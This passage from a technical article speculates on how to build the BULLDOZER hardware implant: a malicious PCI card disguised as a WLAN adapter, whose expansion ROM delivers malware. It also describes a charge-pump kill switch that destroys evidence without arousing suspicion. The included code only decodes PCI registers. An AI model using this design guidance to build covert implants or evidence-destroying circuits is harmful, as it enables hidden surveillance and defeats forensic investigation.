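# Hypothetical 64KB window placed at 0xFEB00000 by the BIOS.
aperture0 = Aperture(pci_base=0xFEB00000, local_base=0x00100000, size=0x10000)
print(hex(aperture0.to_local(0xFEB01234)))
```

The point of the sketch is that the upper address bits select the window while the lower bits pass through unchanged, which is why the window size has to be a power of two and the bases have to be aligned to it.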
The relevant excerpt from the QuickLogic V363EPC datasheet reads:

“4.1.8 Special Function Modes for PCI-to-Local Bus Apertures

PCI-to-Local bus aperture 0 shares some functionality with the expansion ROM base aperture. The address decoder for PCI-to-Local aperture 0 is shared with the expansion ROM base register. When the expansion ROM base is enabled, the decoder will only bridge accesses within the ROM window. When the ROM is disabled, PCI-to-Local bus aperture 0 will function as described above. Typically, the expansion ROM is used only during BIOS boot, if at all. The expansion ROM base register can be completely disabled via software.”

The excerpt above clarifies the PCI expansion ROM mapping. Basically, it says that when the PCI expansion ROM chip mapping is enabled via the XROMBAR register, the aperture will be used only for access to the PCI expansion ROM chip. No other chip can claim the transaction via the aperture.

XROMBAR in the QuickLogic V363EPC chip must be enabled in order to support the PCI expansion ROM. This is quite a complicated task. First, we must find the default XROMBAR register value in the chip. The XROMBAR is named the PCI_ROM register in the QuickLogic V363EPC datasheet, as you can see in Figure 7. The datasheet mentions that the PCI_ROM (XROMBAR) default value upon power-on is 00h. This means the XROMBAR is disabled, because its least significant bit is zero, per the PCI specification. However, this is not a problem, as the default values of the PCI configuration space registers in the QuickLogic V363EPC PCI bridge can be made configurable. There are hardware “straps” that control the default values of the PCI configuration space registers in the QuickLogic V363EPC. One of the strap configurations instructs the QuickLogic V363EPC to “download” the default values of its PCI configuration space registers from an external serial EEPROM chip. Pay attention to the fact that this serial EEPROM chip is an entirely different chip from the PCI expansion ROM chip.
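The role of the least significant bit is easy to see in code. The following Python sketch decodes an XROMBAR value using the generic layout from the PCI specification (bit 0 is the enable bit, bits 31:11 hold the base address) and computes the ROM window size from the standard “write all ones, read back” sizing probe. The function names are mine, and the values are plain integers rather than real configuration space reads; nothing here is specific to the V363EPC.

```python
XROMBAR_ENABLE = 0x00000001     # bit 0: expansion ROM decode enable
XROMBAR_ADDR_MASK = 0xFFFFF800  # bits 31:11: ROM base address


def decode_xrombar(value: int) -> dict:
    """Split a 32-bit XROMBAR value into its enable flag and base address."""
    return {
        "enabled": bool(value & XROMBAR_ENABLE),
        "base": value & XROMBAR_ADDR_MASK,
    }


def rom_window_size(sizing_readback: int) -> int:
    """Window size in bytes, given the value read back after writing
    all ones to the address bits (the standard BAR sizing probe).
    Returns 0 if no address bits are writable (register not implemented)."""
    mask = sizing_readback & XROMBAR_ADDR_MASK
    if mask == 0:
        return 0
    return ((~mask) & 0xFFFFFFFF) + 1


# The power-on default of 00h quoted above decodes as "disabled".
print(decode_xrombar(0x00))
# A device that implements a 64KB ROM window reads back 0xFFFF0000.
print(rom_window_size(0xFFFF0000))
```

A BIOS performs essentially these two steps during PCI enumeration: it probes the size, assigns a base address, and then sets bit 0 only while it copies and runs the expansion ROM.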
Figure 9 shows the “straps” option for the V363EPC PCI configuration space registers.

Figure 9 QuickLogic V363EPC PCI Configuration Space Registers Default Values Initialization “straps” Option. Courtesy: QuickLogic V363EPC datasheet.

Figure 9 shows that there are two “straps” that control the default value initialization in the V363EPC, i.e. SDA and SCL. Both of these “straps” are actually pins on the V363EPC chip. As you can see, when SDA and SCL are connected to a serial EEPROM, the default values of the PCI configuration space registers will be initialized from the serial EEPROM. The SDA and SCL pins adhere to the I2C protocol. I2C is a serial protocol for connecting a microcontroller and other peripheral chips in a cost-efficient manner, i.e. with as few pins as possible, because pins and traces on a circuit board are costly to design and manufacture. SDA stands for Serial Data and SCL stands for Serial Clock.

Figure 10 V363EPC to serial EEPROM connection circuit schematic. Courtesy: QuickLogic V363EPC datasheet.

Figure 10 shows the circuit schematic to implement loading the default PCI configuration space register values from the EEPROM. Now we know how to “force” the V363EPC PCI configuration space register default values to our liking. Once the pull-up resistors are set up to configure the QuickLogic V363EPC to use the serial EEPROM, the default values of its PCI configuration space registers are stored in the serial EEPROM and automatically loaded into the QuickLogic V363EPC PCI configuration space after power-on or PCI bus reset, prior to PCI bus initialization by the motherboard BIOS. This means we can configure the XROMBAR default value via the contents of the serial EEPROM. Therefore, the PCI_ROM (XROMBAR) can be enabled.

Another PCI configuration register to take into account is the PCI_MAP0 register. The PCI_MAP0 register (highlighted in the red box in Figure 7) controls whether the PCI_ROM register is enabled or not.
It also controls the size of the ROM chip to be exposed through the PCI_ROM register. Let’s look into the details of the PCI_MAP0 register. Figure 11 shows the relevant excerpt for the PCI_MAP0 register from the QuickLogic V363EPC datasheet.

Figure 11 PCI_MAP0 register description. Courtesy: QuickLogic V363EPC datasheet

Figure 11 shows the ROM_SIZE bits in the PCI_MAP0 register highlighted in yellow. These bits determine the size of the PCI expansion ROM to be decoded by the QuickLogic V363EPC. As you can see, the chip supports a PCI expansion ROM with a size of up to 64KB. Perhaps this size is smaller than what a malicious PCI expansion ROM payload requires. However, malicious PCI expansion ROM code can load additional code from other memory storage on the PCI add-in card when the ROM code executes. You must configure the default value of the ROM_SIZE bits to the correct value according to your hardware design. Entries in Figure 11 that have their “type” column marked as FRW have default values determined by the contents of the serial EEPROM, if serial EEPROM support is activated via the SDA and SCL “straps”. Therefore, all you need to do is place the correct value in the serial EEPROM to configure their default values.

There is one more PCI configuration space register to take into account to implement the BULLDOZER hardware: the Class Code register. The PCI Class Code register consists of three sub-parts: the base class, the sub-class and the interface. Figure 12 shows the class code selections for the PCI Wireless Controller class of devices.

Figure 12 PCI Wireless Controller Class Code

As you can see in Figure 12, we have to set the class code in our BULLDOZER chip design to base class 0Dh, sub-class 21h and interface 00h to make it masquerade as a PCI WLAN chipset that conforms to WLAN protocol revision B (IEEE 802.11b). Figure 7 shows the location of the Class Code register in the QuickLogic V363EPC chip.
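As a quick illustration of how those three sub-parts fit together, the Python sketch below packs them into the 24-bit class code and shows the byte order in which they appear in PCI configuration space (interface at offset 09h, sub-class at 0Ah, base class at 0Bh, per the standard PCI header). The helper names are made up for this example. How the V363EPC expects the value to be laid out inside its serial EEPROM is a separate question that the datasheet answers; the sketch does not try to model that.

```python
def pack_class_code(base_class: int, sub_class: int, prog_if: int) -> int:
    """Combine base class, sub-class and interface into a 24-bit class code."""
    for name, value in (("base_class", base_class),
                        ("sub_class", sub_class),
                        ("prog_if", prog_if)):
        if not 0 <= value <= 0xFF:
            raise ValueError(f"{name} must fit in one byte")
    return (base_class << 16) | (sub_class << 8) | prog_if


def unpack_class_code(class_code: int) -> tuple:
    """Split a 24-bit class code into (base class, sub-class, interface)."""
    return ((class_code >> 16) & 0xFF,
            (class_code >> 8) & 0xFF,
            class_code & 0xFF)


def class_code_config_bytes(class_code: int) -> bytes:
    """Bytes as they sit at configuration space offsets 09h, 0Ah and 0Bh."""
    return class_code.to_bytes(3, "little")


# Wireless controller (0Dh), sub-class 21h, interface 00h.
wlan_b = pack_class_code(0x0D, 0x21, 0x00)
print(hex(wlan_b))                            # 0xd2100
print(class_code_config_bytes(wlan_b).hex())  # 00210d
```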
All you need to do is store the correct class code in the serial EEPROM used to initialize the contents of the QuickLogic V363EPC PCI configuration space registers. This way our BULLDOZER design conforms to the PCI specification nicely.

At this point we can control the default values of the QuickLogic V363EPC PCI configuration space registers. We have also gained the knowledge required to map a PCI expansion ROM chip into the host x86/x64 CPU address space. The thing that’s left to design is the way to store the BULLDOZER configuration. Let’s assume that we store the BULLDOZER configuration in an NVRAM chip. We can connect the NVRAM chip to the SMT310Q PCI carrier board via the TIM interface, just like the PCI expansion ROM chip. The process of designing the interconnection is similar to what we have done for the PCI expansion ROM chip, except that we must expose the chip to code running on the host x86/x64 CPU via a different aperture, for example PCI-to-Local Aperture 1.

Now we know everything we need to implement the BULLDOZER hardware. There is one more thing left though: the “kill switch”, i.e. the hardware to “destroy” evidence, just in case an operation involving BULLDOZER hardware gets botched.

Implementing “Kill Switch”: Military-Grade Electronics Speculation

It’s standard procedure to have a kill switch in military electronics. A kill switch is a mechanism that enables you to destroy hardware or software remotely, rendering it beyond repair. The destruction must be sufficient to prevent the software or hardware from being analyzed by anyone. There are several reasons to have a kill switch. First, you don’t want an adversary to find evidence that implicates you in the event that an operation fails. Second, you don’t want your adversary to learn about your highly valued technology. There are other strategic reasons to have a kill switch, but those two are enough to justify research into implementing a kill switch in BULLDOZER.
BULLDOZER is hardware that consists of several electronic chips “bound” together via a circuit board. Therefore, what we need to know is the technique to destroy the key chips on a circuit board at a moment’s notice. Surely, we turn to physics to solve this problem. From my experience as an overclocker in the past, I know very well that you can physically destroy a chip by inducing electromigration in it. From Wikipedia:

Electromigration is the transport of material caused by the gradual movement of the ions in a conductor due to the momentum transfer between conducting electrons and diffusing metal atoms.

In simple terms, electromigration means the breakdown of the metal interconnect inside a semiconductor chip, caused by the metal ions that make up the interconnect migrating to an unwanted location. Put another way, electromigration destroys the metal interconnect inside the chip, akin to, but different from, corrosion in metal subjected to a harsh environment. In many cases, electromigration can cause unwanted short circuits inside the chip. Figure 13 shows an illustration of electromigration. The copper ion (Cu+) is pushed along in the direction of the electron flow, because the momentum transferred from the moving electrons (the “electron wind”) outweighs the pull of the electric field in the opposite direction. The copper ion was previously a part of the copper interconnect inside the semiconductor chip. The copper ion “migrates” to a different part of the chip due to electromigration.

Figure 13 Electromigration. Courtesy: Wikipedia

There are many ways to induce electromigration in a semiconductor chip. However, I will focus on only one of them: overvoltage. You can induce electromigration by feeding excess voltage into a chip or into certain parts of a chip. The problem now is designing a circuit to overvoltage only a certain part of a semiconductor chip. Let’s assume that we don’t want to overvoltage the entire chip, because we have previously assumed that BULLDOZER masquerades as a PCI WLAN chip.
Therefore, you only want to destroy the part that implements the custom stealthy wireless communication protocol, not the part that implements the WLAN protocol. If the WLAN function were suddenly destroyed, it would raise suspicion at the target.

One way to create a large voltage inside an electronic circuit is to use a so-called “charge pump”. A charge pump is a DC-to-DC converter that uses capacitors as energy storage elements to create either a higher or a lower voltage power source. As far as I know, it’s quite trivial to implement a capacitor in a semiconductor chip. Therefore, using a charge pump to create our required overvoltage source should be achievable. Figure 14 shows one of the charge pump designs.

Figure 14 Dickson Charge Pump Design with MOSFETs. Courtesy: Wikipedia

Vin in Figure 14 is the source voltage that’s going to be “multiplied”. Vo in Figure 14 is the output voltage, i.e. a multiple of the input voltage. As you can see, we can create a voltage several times higher than the source voltage inside a semiconductor chip by using a charge pump. I have used a charge pump in one of my projects in the past. It was made of discrete electronic parts. The output voltage is usually not an exact multiple of the input voltage due to losses in the “multiplier” circuit. I suspect that a charge pump implemented inside a semiconductor chip provides a better “voltage multiplication” function than a discrete one.

At this point, we have all the things needed to create a kill switch. Your circuit design only needs to incorporate the charge pump. You can use a control register in an FPGA to feed the logic that decides whether to activate the charge pump or not. You can devise certain byte patterns that turn on the charge pump to destroy your prized malicious logic parts on the PCI add-in card. There are surely many ways to implement a kill switch. Using a charge pump is only one of the many.
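To put rough numbers on the “voltage multiplication” and its losses, here is a small Python sketch of the commonly quoted first-order model for a Dickson charge pump. This is a textbook approximation and not a model of any particular chip: the function name and all parameter names are mine, the per-stage voltage drop stands in for the diode drop or MOSFET threshold voltage, and the example values are arbitrary.

```python
def dickson_output_voltage(v_in: float, stages: int, v_clk: float,
                           v_drop: float = 0.0, c_pump: float = 1.0,
                           c_stray: float = 0.0, i_out: float = 0.0,
                           f_clk: float = 1.0) -> float:
    """First-order estimate of a Dickson charge pump's output voltage.

    v_in    : input (source) voltage in volts
    stages  : number of pumping stages (N)
    v_clk   : clock amplitude in volts
    v_drop  : voltage lost per diode or diode-connected MOSFET
    c_pump  : pumping capacitance per stage in farads
    c_stray : stray capacitance per node in farads
    i_out   : load current in amperes
    f_clk   : clock frequency in hertz
    """
    if stages < 1:
        raise ValueError("need at least one stage")
    if c_pump <= 0 or f_clk <= 0:
        raise ValueError("c_pump and f_clk must be positive")
    c_total = c_pump + c_stray
    # Each stage adds the clock swing (reduced by the capacitive divider),
    # minus one device drop, minus the droop caused by the load current.
    gain_per_stage = (v_clk * c_pump / c_total
                      - v_drop
                      - i_out / (f_clk * c_total))
    # N stages use N + 1 devices, hence the extra v_drop at the output.
    return v_in + stages * gain_per_stage - v_drop


ideal = dickson_output_voltage(v_in=3.3, stages=4, v_clk=3.3)
lossy = dickson_output_voltage(v_in=3.3, stages=4, v_clk=3.3, v_drop=0.6)
print(round(ideal, 2), round(lossy, 2))
```

With these example values, an ideal four-stage pump fed from 3.3 V reaches about 16.5 V, i.e. five times the input, while a 0.6 V drop per device pulls that down to about 13.5 V. That gap is the kind of loss that keeps the output from being an exact multiple of the input.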
I present the charge pump here merely out of my “intuition” about how to solve the problem of creating a kill switch. The military surely has more tricks up its sleeve.

BULLDOZER Implementation Recap

We have gathered all the techniques needed to build “BULLDOZER-equivalent” hardware in the previous sections. Surely, this is based on our earlier assumption that BULLDOZER masquerades as a PCI WLAN add-in card. Now, let’s compose a recap, building on those newly acquired techniques and our assumptions at the beginning of this article. The recap is as follows:

BULLDOZER is a malicious PCI add-in card that masquerades as a PCI WLAN card. It implements the correct PCI class code to masquerade as a PCI WLAN card.

BULLDOZER implements a PCI expansion ROM because it’s the delivery mechanism to “inject” GINSU malware code into the x86/x64 host system.

BULLDOZER uses SDR to implement a stealthy wireless communication protocol to communicate with OMNIGAT.

BULLDOZER was designed by using SDR FPGA prototyping tools before being fabricated as an ASIC in the NSA’s semiconductor fab. The NSA could use Altera, Xilinx or internally developed FPGA prototyping tools.

BULLDOZER exposes the PCI expansion ROM chip via the XROMBAR in its PCI configuration space. The size of the PCI expansion ROM chip exposed through XROMBAR is limited to 16MB, per the PCI specification. However, one can devise “custom” code to download additional content from the BULLDOZER PCI add-in card to system RAM as needed during the PCI expansion ROM execution. 16MB is already a large space for malicious firmware-level code though.

It’s not yet clear whether one desktop PC implanted with BULLDOZER is enough or whether more are required to make it work. However, the GINSU extended concept of operation implies that one BULLDOZER-implanted desktop PC is enough.

A possibility not covered in this article is that the NSA licensed the design for the non-stealthy PCI WLAN controller chip part of BULLDOZER from commercial vendors such as Broadcom or Ralink.
This could shorten the BULLDOZER design and implementation timeframe by quite a lot. Another possibility not covered here is the BULLDOZER PCI chip being a multifunction PCI chip. The PCI bus protocol supports a single physical PCI controller chip that contains multiple functions. We don’t delve into that possibility here though.

As for the chip marking on the BULLDOZER PCI WLAN controller chip, it could easily be carried out by the NSA fab. Well, with the right tool, anyone can even print the “I Love You” phrase as a legitimate-looking chip marking, like the one shown in Andrew “bunnie” Huang’s blog: Qué romántico! « bunnie's blog.

That is all for our BULLDOZER implementation recap. It has been quite a long journey, but we now have a clearer picture of the BULLDOZER hardware implementation.

Closing Thoughts: BULLDOZER Evolution

Given that BULLDOZER was fielded almost six years ago, the present-day BULLDOZER coming out of the NSA’s fab must have evolved, perhaps into a PCI Express add-in card. It’s quite trivial to migrate the BULLDOZER design explained in this article to PCI Express (PCIe) though. Therefore, the NSA shouldn’t have any difficulty carrying out the protocol conversion. PCIe is compatible with PCI at the logical level of the protocol. Therefore, most of the non-physical design can be carried over from the PCI version of the BULLDOZER design explained here. We should look into the “evolved” BULLDOZER in the future.